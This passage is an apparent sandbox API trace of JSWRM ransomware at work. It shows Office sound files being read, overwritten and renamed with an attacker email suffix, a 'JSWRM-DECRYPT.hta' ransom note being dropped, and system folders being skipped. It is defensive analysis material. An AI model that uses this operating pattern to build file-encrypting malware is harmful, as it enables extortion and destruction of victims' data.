cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Whistling.wav", lpUsedDefaultChar=0x0) returned 13 [0130.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\Whistling.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\whistling.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.814] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=29442) returned 1 [0130.814] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.814] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7300, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x7300, lpOverlapped=0x0) returned 1 [0130.817] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.817] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7300, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x7300, lpOverlapped=0x0) returned 1 [0130.817] CloseHandle (hObject=0x338) returned 1 [0130.818] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\Whistling.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\whistling.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\Whistling.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\whistling.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.818] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7302, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="Whistling.wav", cAlternateFileName="WHISTL~1.WAV")) returned 0 [0130.818] FindClose (in: hFindFile=0x231d00 | out: hFindFile=0x231d00) returned 1 [0130.819] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1907d846, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1907d846, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="Places", cAlternateFileName="")) returned 1 [0130.819] lstrcmpiW (lpString1="Places", lpString2=".") returned 1 [0130.819] lstrcmpiW (lpString1="Places", lpString2="..") returned 1 [0130.819] lstrcmpiW (lpString1="Places", lpString2="...") returned 1 [0130.819] lstrcmpiW (lpString1="Places", lpString2="windows") returned -1 [0130.819] lstrcmpiW (lpString1="Places", lpString2="recovery") returned -1 [0130.819] lstrcmpiW (lpString1="Places", lpString2="perflogs") returned 1 [0130.819] lstrcmpiW (lpString1="Places", lpString2="documents and settings") returned 1 [0130.819] lstrcmpiW (lpString1="Places", lpString2="$RECYCLE.BIN") returned 1 [0130.819] lstrcmpiW (lpString1="Places", lpString2="system volume information") returned -1 [0130.819] lstrcmpiW (lpString1="Places", lpString2="msocache") returned 1 [0130.819] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\jswrm-decrypt.hta")) returned 0xffffffff [0130.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.822] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.822] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0130.823] CloseHandle (hObject=0x314) returned 1 [0130.824] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\jswrm-decrypt.hta")) returned 0x20 [0130.824] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1907d846, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44a2e52d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210734, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0130.824] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0130.824] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1907d846, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44a2e52d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="..", cAlternateFileName="")) returned 1 [0130.824] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0130.824] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0130.824] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x84e0, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="ALARM.WAV", cAlternateFileName="")) returned 1 [0130.824] lstrcmpiW (lpString1="ALARM.WAV", lpString2=".") returned 1 [0130.824] lstrcmpiW (lpString1="ALARM.WAV", lpString2="..") returned 1 [0130.824] lstrcmpiW (lpString1="ALARM.WAV", lpString2="...") returned 1 [0130.824] lstrcmpiW (lpString1="ALARM.WAV", lpString2="windows") returned -1 [0130.824] lstrcmpiW (lpString1="ALARM.WAV", lpString2="recovery") returned -1 [0130.824] lstrcmpiW (lpString1="ALARM.WAV", lpString2="perflogs") returned -1 [0130.824] lstrcmpiW (lpString1="ALARM.WAV", lpString2="documents and settings") returned -1 [0130.824] lstrcmpiW (lpString1="ALARM.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.824] lstrcmpiW (lpString1="ALARM.WAV", lpString2="system volume information") returned -1 [0130.824] lstrcmpiW (lpString1="ALARM.WAV", lpString2="msocache") returned -1 [0130.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALARM.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALARM.WAV", cchWideChar=9, lpMultiByteStr=0x345e508, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALARM.WAV", lpUsedDefaultChar=0x0) returned 9 [0130.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALARM.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALARM.WAV", cchWideChar=9, lpMultiByteStr=0x345e4d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALARM.WAV", lpUsedDefaultChar=0x0) returned 9 [0130.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\ALARM.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\alarm.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.825] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=34016) returned 1 [0130.825] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.825] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x84e0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x84e0, lpOverlapped=0x0) returned 1 [0130.829] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.829] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x84e0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x84e0, lpOverlapped=0x0) returned 1 [0130.829] CloseHandle (hObject=0x338) returned 1 [0130.830] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\ALARM.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\alarm.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\ALARM.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\alarm.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.831] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xeb78, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="BUZZ.WAV", cAlternateFileName="")) returned 1 [0130.831] lstrcmpiW (lpString1="BUZZ.WAV", lpString2=".") returned 1 [0130.831] lstrcmpiW (lpString1="BUZZ.WAV", lpString2="..") returned 1 [0130.831] lstrcmpiW (lpString1="BUZZ.WAV", lpString2="...") returned 1 [0130.831] lstrcmpiW (lpString1="BUZZ.WAV", lpString2="windows") returned -1 [0130.831] lstrcmpiW (lpString1="BUZZ.WAV", lpString2="recovery") returned -1 [0130.831] lstrcmpiW (lpString1="BUZZ.WAV", lpString2="perflogs") returned -1 [0130.831] lstrcmpiW (lpString1="BUZZ.WAV", lpString2="documents and settings") returned -1 [0130.831] lstrcmpiW (lpString1="BUZZ.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.831] lstrcmpiW (lpString1="BUZZ.WAV", lpString2="system volume information") returned -1 [0130.831] lstrcmpiW (lpString1="BUZZ.WAV", lpString2="msocache") returned -1 [0130.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BUZZ.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BUZZ.WAV", cchWideChar=8, lpMultiByteStr=0x345e508, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BUZZ.WAV", lpUsedDefaultChar=0x0) returned 8 [0130.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BUZZ.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BUZZ.WAV", cchWideChar=8, lpMultiByteStr=0x345e4d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BUZZ.WAV", lpUsedDefaultChar=0x0) returned 8 [0130.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\BUZZ.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\buzz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.832] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=60280) returned 1 [0130.832] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.832] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0xeb70, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0xeb70, lpOverlapped=0x0) returned 1 [0130.837] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.837] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xeb70, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0xeb70, lpOverlapped=0x0) returned 1 [0130.838] CloseHandle (hObject=0x338) returned 1 [0130.838] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\BUZZ.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\buzz.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\BUZZ.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\buzz.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.839] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44a2e52d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x44a2e52d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x44a2e52d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0130.839] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0130.839] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0130.839] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0130.839] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0130.839] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0130.839] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0130.839] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0130.839] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0130.839] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0130.839] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0130.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.839] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd686, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="LASER.WAV", cAlternateFileName="")) returned 1 [0130.839] lstrcmpiW (lpString1="LASER.WAV", lpString2=".") returned 1 [0130.839] lstrcmpiW (lpString1="LASER.WAV", lpString2="..") returned 1 [0130.839] lstrcmpiW (lpString1="LASER.WAV", lpString2="...") returned 1 [0130.839] lstrcmpiW (lpString1="LASER.WAV", lpString2="windows") returned -1 [0130.839] lstrcmpiW (lpString1="LASER.WAV", lpString2="recovery") returned -1 [0130.839] lstrcmpiW (lpString1="LASER.WAV", lpString2="perflogs") returned -1 [0130.839] lstrcmpiW (lpString1="LASER.WAV", lpString2="documents and settings") returned 1 [0130.839] lstrcmpiW (lpString1="LASER.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.839] lstrcmpiW (lpString1="LASER.WAV", lpString2="system volume information") returned -1 [0130.839] lstrcmpiW (lpString1="LASER.WAV", lpString2="msocache") returned -1 [0130.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LASER.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LASER.WAV", cchWideChar=9, lpMultiByteStr=0x345e508, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LASER.WAV", lpUsedDefaultChar=0x0) returned 9 [0130.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LASER.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LASER.WAV", cchWideChar=9, lpMultiByteStr=0x345e4d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LASER.WAV", lpUsedDefaultChar=0x0) returned 9 [0130.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\LASER.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\laser.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.840] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=54918) returned 1 [0130.840] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.840] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0xd680, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0xd680, lpOverlapped=0x0) returned 1 [0130.846] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.847] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xd680, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0xd680, lpOverlapped=0x0) returned 1 [0130.847] CloseHandle (hObject=0x338) returned 1 [0130.847] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\LASER.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\laser.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\LASER.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\laser.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.848] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18afa0b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18afa0b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18afa0b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x100ea, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="RADAR.WAV", cAlternateFileName="")) returned 1 [0130.848] lstrcmpiW (lpString1="RADAR.WAV", lpString2=".") returned 1 [0130.848] lstrcmpiW (lpString1="RADAR.WAV", lpString2="..") returned 1 [0130.848] lstrcmpiW (lpString1="RADAR.WAV", lpString2="...") returned 1 [0130.848] lstrcmpiW (lpString1="RADAR.WAV", lpString2="windows") returned -1 [0130.848] lstrcmpiW (lpString1="RADAR.WAV", lpString2="recovery") returned -1 [0130.848] lstrcmpiW (lpString1="RADAR.WAV", lpString2="perflogs") returned 1 [0130.849] lstrcmpiW (lpString1="RADAR.WAV", lpString2="documents and settings") returned 1 [0130.849] lstrcmpiW (lpString1="RADAR.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.849] lstrcmpiW 